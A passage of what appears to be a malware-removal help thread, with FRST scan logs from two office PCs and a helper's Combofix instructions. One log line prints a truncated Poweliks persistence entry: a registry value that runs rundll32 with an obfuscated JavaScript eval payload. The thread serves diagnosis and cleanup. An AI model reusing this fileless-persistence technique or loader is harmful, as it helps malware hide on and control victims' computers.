Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{DE28B448-32E8-4E8F-84F0-A52B21A49B5B}) (Version:  - Microsoft)
Service Pack 2 for Microsoft Office 2010 (KB2687455) 32-Bit Edition (x32 Version:  - Microsoft) Hidden
Sonic CinePlayer Decoder Pack (x32 Version: 4.3.0 - Sonic Solutions) Hidden
Superfare Scripts V1.0.24 (HKLM-x32\...\Superfare Scripts_is1) (Version:  - Shelley Consulting)
TCR 10 (HKLM-x32\...\TCR 10) (Version:  - )
Trams Back Office (HKLM-x32\...\Trams Back Office) (Version:  - Sabre)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft Filter Pack 2.0 (KB2878281) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.OUTLOOK_{302A8FE3-EBF5-486C-A431-16A1CD914443}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589298) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{DADF7E25-FFA4-4D02-BE84-1DAE62C18516}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589352) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.OUTLOOK_{F4284D93-7AE8-4309-8CF3-9AD394F35F3A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2589375) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{287A1E92-9E41-4BC1-8920-B3D0E9220800}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2597087) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{9D69691D-823D-4C3E-9B12-563A3F520366}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2687502) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0409-0000-0000000FF1CE}_Office14.OUTLOOK_{7DE7DF97-82FE-4B3A-AB8D-1621F9CC464A}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2760598) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.OUTLOOK_{ECFE33A3-B8B7-439A-ADE4-59FBD29EF9B8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2794737) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{5AA578BB-759C-40FD-9661-A737C0884541}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2837581) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{334FB202-28D7-4BA4-8BC9-4FE4AB233EA0}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2878252) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{B0DB9F71-E0F7-4FE6-8925-35B860CAC0C4}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-040C-0000-0000000FF1CE}_Office14.OUTLOOK_{089DBFD7-8211-43B2-AAAE-5BDD8C23E3A8}) (Version:  - Microsoft)
Update for Microsoft Office 2010 (KB2881028) 32-Bit Edition (HKLM-x32\...\{90140000-001F-0C0A-0000-0000000FF1CE}_Office14.OUTLOOK_{794A0574-4E2F-4D58-B2A0-D7460ACDC85C}) (Version:  - Microsoft)
Update for Microsoft OneNote 2010 (KB2837595) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.OUTLOOK_{51CCA922-A0CC-47C4-8910-6936D97CAC2E}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{2AB483F1-C86E-427A-83B4-23889B03512D}) (Version:  - Microsoft)
Update for Microsoft Outlook 2010 (KB2687567) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0409-0000-0000000FF1CE}_Office14.OUTLOOK_{DCE104A1-1875-4469-A83D-A5BFA6C4640F}) (Version:  - Microsoft)
Update for Microsoft SharePoint Workspace 2010 (KB2760601) 32-Bit Edition (HKLM-x32\...\{90140000-002A-0000-1000-0000000FF1CE}_Office14.OUTLOOK_{F9F5A080-AF38-4966-9A6B-C43DCA465035}) (Version:  - Microsoft)
Update for Microsoft Word 2010 (KB2880529) 32-Bit Edition (HKLM-x32\...\{90140000-001A-0000-0000-0000000FF1CE}_Office14.OUTLOOK_{B9B89E01-5B6B-4F73-BC34-B2C0D8ACB4CD}) (Version:  - Microsoft)
Windows Live Communications Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 15.4.3508.1109 - Microsoft Corporation)
Windows Live Essentials (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live ID Sign-in Assistant (Version: 7.250.4225.0 - Microsoft Corporation) Hidden
Windows Live Installer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Language Selector (Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Mail (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Messenger (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live MIME IFilter (Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Movie Maker (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Common (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Photo Gallery (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live PIMT Platform (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live SOXE (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live SOXE Definitions (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live UX Platform Language Pack (x32 Version: 15.4.3508.1109 - Microsoft Corporation) Hidden
Windows Live Writer (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden
Windows Live Writer Resources (x32 Version: 15.4.3502.0922 - Microsoft Corporation) Hidden

==================== Custom CLSID (selected items): ==========================

(If an entry is included in the fixlist, it will be removed from registry. Any eventual file will not be moved.)

CustomCLSID: HKU\S-1-5-21-1305414874-3063939017-1416520829-1002_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?

==================== Restore Points  =========================


==================== Hosts content: ==========================

(If needed Hosts: directive could be included in the fixlist to reset Hosts.)

2009-07-13 22:34 - 2009-06-10 17:00 - 00000824 ____A C:\Windows\system32\Drivers\etc\hosts

==================== Scheduled Tasks (whitelisted) =============

(If an entry is included in the fixlist, it will be removed from registry. Any associated file could be listed separately to be moved.)

Task: {0D58F4E2-E3FD-4E05-8C82-CCAD69414BAB} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-27] (Google Inc.)
Task: {33C21B4E-99DD-499F-A979-1F6FA21CCF7C} - System32\Tasks\GoogleUpdateTaskMachineUA => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2014-01-27] (Google Inc.)
Task: {3A7CEB89-D6F1-4B51-9000-2AFBC8DE0C75} - System32\Tasks\CCleanerSkipUAC => C:\Program Files\CCleaner\CCleaner.exe [2013-07-22] (Piriform Ltd)
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe

==================== Loaded Modules (whitelisted) =============

2013-08-20 00:53 - 2013-04-15 11:50 - 00198144 _____ () C:\Windows\System32\HP1006LM.DLL
2013-08-20 00:55 - 2013-04-15 11:50 - 00065024 _____ () C:\Windows\system32\spool\PRTPROCS\x64\HP1006PP.dll
2013-08-19 19:47 - 2012-04-09 14:24 - 00055152 _____ () C:\ICVERIFY\ICWin420\PCVXWinServiceManager.exe
2013-08-19 19:47 - 2012-04-09 14:26 - 00149360 _____ () C:\ICVERIFY\ICWin420\Jcard\JCardService.exe
2013-08-12 14:22 - 2012-03-26 18:33 - 00094208 _____ () C:\Windows\System32\IccLibDll_x64.dll
2014-06-26 10:54 - 2014-06-26 10:54 - 00623432 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\boost_regex-vc100-mt-1_47.dll
2014-06-26 10:56 - 2014-06-26 10:56 - 00021320 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\QBCompressor.dll
2014-06-26 06:42 - 2014-06-26 06:42 - 00059904 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\zlib1.dll
2014-06-26 10:56 - 2014-06-26 10:56 - 00149320 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\QBMAPILibrary.dll
2014-06-26 10:54 - 2014-06-26 10:54 - 00247112 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\boost_serialization-vc100-mt-1_47.dll
2014-06-26 10:54 - 2014-06-26 10:54 - 00623944 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\FtuEngine.dll
2014-06-26 10:53 - 2014-06-26 10:53 - 00582472 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\BackupLib.dll
2014-06-26 10:56 - 2014-06-26 10:56 - 00142664 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\QBProActiveCore.dll
2014-06-26 10:54 - 2014-06-26 10:54 - 00791880 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\FeaturesBridge.dll
2014-06-26 10:55 - 2014-06-26 10:55 - 00043848 _____ () C:\Program Files (x86)\Intuit1\QuickBooks 2014\mbpopup.dll
2013-08-19 21:54 - 2003-03-26 18:46 - 00135168 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsImgIO.dll
2013-08-19 21:54 - 2008-10-16 19:01 - 00036864 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuUpdater.dll
2013-08-20 00:06 - 2008-06-10 18:10 - 00032768 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsLaunchApp.dll
2013-08-20 00:06 - 2008-02-20 17:49 - 00028672 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsExtention.dll
2013-08-20 00:06 - 2008-06-17 14:18 - 00024576 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PfuSsCommon.dll
2013-08-19 21:54 - 2007-06-26 20:27 - 00167936 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\SSsltsa.dll
2013-08-19 21:54 - 2003-04-21 14:19 - 00020480 _____ () C:\Windows\SSDriver\fi5110\fjipl.dll
2013-08-19 21:54 - 2003-04-21 14:19 - 00851968 _____ () C:\Windows\SSDriver\fi5110\fjiplA6.DLL
2013-08-19 21:54 - 2005-07-08 11:36 - 00094208 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\f5bdkedr.dll
2013-08-19 21:54 - 1996-12-19 13:24 - 00068608 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\F5BDKAKU.DLL
2013-08-19 21:54 - 2003-11-20 21:56 - 00020480 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\ssIpl.dll
2013-08-19 21:54 - 2003-11-20 21:56 - 00294912 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\ssIplA6.DLL
2013-08-19 21:54 - 2007-05-16 08:45 - 00011776 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\SecurityManager.dll
2013-08-19 21:54 - 2007-05-16 08:45 - 00009216 _____ () C:\Program Files (x86)\PFU\ScanSnap\Driver\PolicyCommon.dll
2014-08-25 13:38 - 2014-08-25 13:38 - 03800688 _____ () C:\Program Files (x86)\Mozilla Firefox\mozjs.dll

==================== Alternate Data Streams (whitelisted) =========

(If an entry is included in the fixlist, only the Alternate Data Streams will be removed.)


==================== Safe Mode (whitelisted) ===================

(If an item is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\GoToAssist Remote Support Customer => ""="Service"

==================== EXE Association (whitelisted) =============

(If an entry is included in the fixlist, the default will be restored. None default entries will be removed.)


==================== MSCONFIG/TASK MANAGER disabled items =========

(Currently there is no automatic fix for this section.)

MSCONFIG\startupfolder: C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^QuickBooks Update Agent.lnk => C:\Windows\pss\QuickBooks Update Agent.lnk.CommonStartup
MSCONFIG\startupreg: Adobe ARM => "C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe"
MSCONFIG\startupreg: AdobeAAMUpdater-1.0 => "C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe"
MSCONFIG\startupreg: BCSSync => "C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe" /DelayServices
MSCONFIG\startupreg: Desktop Disc Tool => "C:\Program Files (x86)\Roxio\OEM\Roxio Burn\RoxioBurnLauncher.exe"
MSCONFIG\startupreg: GoogleChromeAutoLaunch_750F906B42ACC1CB72E4EE60E2CAC921 => "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --no-startup-window
MSCONFIG\startupreg: Intuit SyncManager => C:\Program Files (x86)\Common Files\Intuit\Sync\IntuitSyncManager.exe  startup
MSCONFIG\startupreg: PDVD9LanguageShortcut => "C:\Program Files (x86)\CyberLink\PowerDVD9\Language\Language.exe"
MSCONFIG\startupreg: RemoteControl9 => "C:\Program Files (x86)\CyberLink\PowerDVD9\PDVD9Serv.exe"

==================== Faulty Device Manager Devices =============


==================== Event log errors: =========================

Application errors:
==================
Error: (09/01/2014 01:28:24 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (09/01/2014 01:01:21 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (09/01/2014 00:20:53 AM) (Source: WinMgmt) (EventID: 10) (User: )
Description: //./root/CIMV2SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA "Win32_Processor" AND TargetInstance.LoadPercentage > 990x80041003

Error: (08/31/2014 05:13:20 PM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks Pro Plus 2014":
DB error -308 ErrorMessage:'Connection was terminated' from file:'.\.\src\DMSQLPrefAttribute.cpp' at line 153 from function:'DMPrefAttribute::IDBPrefAttribute::DBLoad'

Error: (08/31/2014 05:13:19 AM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks Pro Plus 2014":
DB error -308 ErrorMessage:'Connection was terminated' from file:'.\.\src\DMSQLPrefAttribute.cpp' at line 153 from function:'DMPrefAttribute::IDBPrefAttribute::DBLoad'

Error: (08/30/2014 05:13:19 PM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks Pro Plus 2014":
DB error -308 ErrorMessage:'Connection was terminated' from file:'.\.\src\DMSQLPrefAttribute.cpp' at line 153 from function:'DMPrefAttribute::IDBPrefAttribute::DBLoad'

Error: (08/30/2014 05:13:18 AM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks Pro Plus 2014":
DB error -308 ErrorMessage:'Connection was terminated' from file:'.\.\src\DMSQLPrefAttribute.cpp' at line 153 from function:'DMPrefAttribute::IDBPrefAttribute::DBLoad'

Error: (08/29/2014 10:35:59 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: iexplore.exe, version: 9.0.8112.16563, time stamp: 0x4a5bc6b7
Faulting module name: Flash32_11_8_800_94.ocx, version: 11.8.800.94, time stamp: 0x51c4d6e5
Exception code: 0xc0000005
Fault offset: 0x005fa927
Faulting process id: 0x29e0
Faulting application start time: 0xiexplore.exe0
Faulting application path: iexplore.exe1
Faulting module path: iexplore.exe2
Report Id: iexplore.exe3

Error: (08/29/2014 06:27:27 PM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks Pro Plus 2014":
DB error -308 ErrorMessage:'Connection was terminated' from file:'.\.\src\DMSQLPrefAttribute.cpp' at line 153 from function:'DMPrefAttribute::IDBPrefAttribute::DBLoad'

Error: (08/29/2014 05:13:17 PM) (Source: QuickBooks) (EventID: 4) (User: )
Description: An unexpected error has occured in "QuickBooks Pro Plus 2014":
DB error -308 ErrorMessage:'Connection was terminated' from file:'.\.\src\DMSQLPrefAttribute.cpp' at line 153 from function:'DMPrefAttribute::IDBPrefAttribute::DBLoad'


System errors:
=============
Error: (09/01/2014 01:29:49 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The PCVXFileMonitor service hung on starting.

Error: (09/01/2014 01:29:45 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The ICVTnsServer service hung on starting.

Error: (09/01/2014 01:28:34 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (09/01/2014 01:28:20 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The PMEM service failed to start due to the following error:
%%1275

Error: (09/01/2014 01:28:20 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Windows\SysWOW64\drivers\pmemnt.sys has been blocked from loading due to incompatibility with this system. Please contact your software vendor for a compatible version of the driver.

Error: (09/01/2014 01:02:46 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The PCVXFileMonitor service hung on starting.

Error: (09/01/2014 01:02:42 AM) (Source: Service Control Manager) (EventID: 7022) (User: )
Description: The ICVTnsServer service hung on starting.

Error: (09/01/2014 01:01:31 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (09/01/2014 01:01:18 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: The PMEM service failed to start due to the following error:
%%1275

Error: (09/01/2014 01:01:18 AM) (Source: Application Popup) (EventID: 1060) (User: )
Description: \??\C:\Windows\SysWOW64\drivers\pmemnt.sys has been blocked from loading due to incompatibility with this system. Please contact your software vendor for a compatible version of the driver.


Microsoft Office Sessions:
=========================

CodeIntegrity Errors:
===================================
  Date: 2014-09-01 01:28:20.678
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-09-01 01:28:20.632
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-09-01 01:01:18.022
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-09-01 01:01:17.975
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-08-28 03:20:35.126
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-08-28 03:20:35.095
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-08-16 03:34:49.373
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-08-16 03:34:49.342
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-08-11 10:12:07.430
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2014-08-11 10:12:07.398
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\Windows\SysWOW64\drivers\PMEMNT.SYS because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.


==================== Memory info ===========================

Processor: Intel® Core™ i5-3470 CPU @ 3.20GHz
Percentage of memory in use: 85%
Total physical RAM: 6046.07 MB
Available physical RAM: 903.72 MB
Total Pagefile: 12090.32 MB
Available Pagefile: 4586.14 MB
Total Virtual: 8192 MB
Available Virtual: 8191.81 MB

==================== Drives ================================

Drive c: (OSDisk) (Fixed) (Total:452.09 GB) (Free:384.33 GB) NTFS
Drive i: (OS) (Network) (Total:464.98 GB) (Free:316.15 GB) NTFS
Drive m: (OS) (Network) (Total:464.98 GB) (Free:316.15 GB) NTFS
Drive p: (OS) (Network) (Total:464.98 GB) (Free:316.15 GB) NTFS
Drive s: (OS) (Network) (Total:464.98 GB) (Free:316.15 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: C70A6B68)
Partition 1: (Not Active) - (Size=452.1 GB) - (Type=07 NTFS)
Partition 2: (Active) - (Size=13.7 GB) - (Type=07 NTFS)

==================== End Of Log ============================

 



BC AdBot (Login to Remove)

 


#2 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:45 AM

Posted 01 September 2014 - 08:19 AM

Hi there,

please run Combofix:


Please download Combofix (by sUBs) and save it to your Desktop.
  • Disable the realtime-protection of your antivirus and anti-malware programs because they might interfere with the scan.
  • Start Combofix.exe and follow its instructions.
  • Do not use the computer while the scan is running. This may cause the program to stall.
  • When finished, a log file will be displayed (that can also be found at C:\Combofix.txt).
    Please copy and paste the contents of this file into your next post.
Note: If you receive an error "Illegal operation attempted on a registry key that has been marked for deletion." after the scan, just restart the computer.
(You can find more detailed instructions in this guide on using Combofix.)

#3 litepc

litepc
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:45 AM

Posted 01 September 2014 - 08:28 AM

Thank you kindly:

 

I will do that i guess when i am actaully at the PC. i was working remotely so i will try it tomorrow and update you.

 

Thank you again,

 

Emanuel



#4 aharonov

aharonov

  • Malware Response Team
  • 2,441 posts
  • OFFLINE
  •  
  • Gender:Male
  • Local time:11:45 AM

Posted 01 September 2014 - 11:21 AM

Ok, that's alright, thanks for letting me know.

#5 litepc

litepc
  • Topic Starter

  • Members
  • 12 posts
  • OFFLINE
  •  
  • Local time:05:45 AM

Posted 01 September 2014 - 12:01 PM

Thank you.

 

In the meantime i have a problem with my other PC.

I ran the combofix it had errors but then it did all of the 11 scans but it did not do anyhting more then that.

here are the FRST files for that one... if you can help any please.

 

Thakn you.

 

---------------------------------------------------------------------------------

 

Scan result of Farbar Recovery Scan Tool (FRST) (x86) Version:31-08-2014 02
Ran by LW (administrator) on TravelR on 01-09-2014 12:31:15
Running from C:\Documents and Settings\LW\My Documents\Downloads
Platform: Microsoft Windows XP Professional Service Pack 3 (X86) OS Language: English (United States)
Internet Explorer Version 8
Boot Mode: Normal

The only official download link for FRST:
Download link for 32-Bit version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/81/
Download link for 64-Bit Version: http://www.bleepingcomputer.com/download/farbar-recovery-scan-tool/dl/82/
Download link from any site other than Bleeping Computer is unpermitted or outdated.
See tutorial for FRST: http://www.geekstogo.com/forum/topic/335081-frst-tutorial-how-to-use-farbar-recovery-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(Enigma Software Group USA, LLC.) C:\PROGRA~1\ENIGMA~1\SPYHUN~1\SH4SER~1.EXE
(Amadeus) C:\Program Files\Automatic Update\AutoUpdate.exe
(ESET) C:\Program Files\ESET\ESET NOD32 Antivirus\ekrn.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_service.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2svc.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2comm.exe
(HP) C:\Program Files\HP\HPLaserJetService\HPLaserJetService.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2pre.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToMyPC\g2tray.exe
(Sun Microsystems, Inc.) C:\Program Files\Java\jre6\bin\jqs.exe
(Microsoft Corporation) C:\Program Files\Common Files\Microsoft Shared\VS7DEBUG\MDM.EXE
(Intuit) C:\Program Files\Common Files\Intuit\QuickBooks\QBCFMonitorService.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\DataProtect\QBIDPService.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_comm_customer.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_system_customer.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_user_customer.exe
(Intel Corporation) C:\WINDOWS\system32\igfxpers.exe
(CyberLink Corp.) C:\Program Files\CyberLink\PowerDVD DX\PDVDDXSrv.exe
(Intel Corporation) C:\WINDOWS\system32\hkcmd.exe
(Intel Corporation) C:\WINDOWS\system32\igfxsrvc.exe
(Hewlett-Packard Company) C:\Program Files\HP\ToolboxFX\bin\HPTLBXFX.exe
(Analog Devices, Inc.) C:\Program Files\Analog Devices\Core\smax4pnp.exe
(Hewlett-Packard) C:\Program Files\HP\HP Software Update\hpwuschd2.exe
(Google Inc.) C:\Program Files\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe
(Intuit Inc.) C:\Program Files\Common Files\Intuit\QuickBooks\QBUpdate\qbupdate.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\wscntfy.exe
(Starfield Technologies) C:\Program Files\Workspace\workspaceupdate.exe
(Citrix Online, a division of Citrix Systems, Inc.) C:\Program Files\Citrix\GoToAssist Remote Support Customer\715\g2ax_host.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\Program Files\Internet Explorer\iexplore.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\taskmgr.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
(Microsoft Corporation) C:\WINDOWS\system32\dllhost.exe
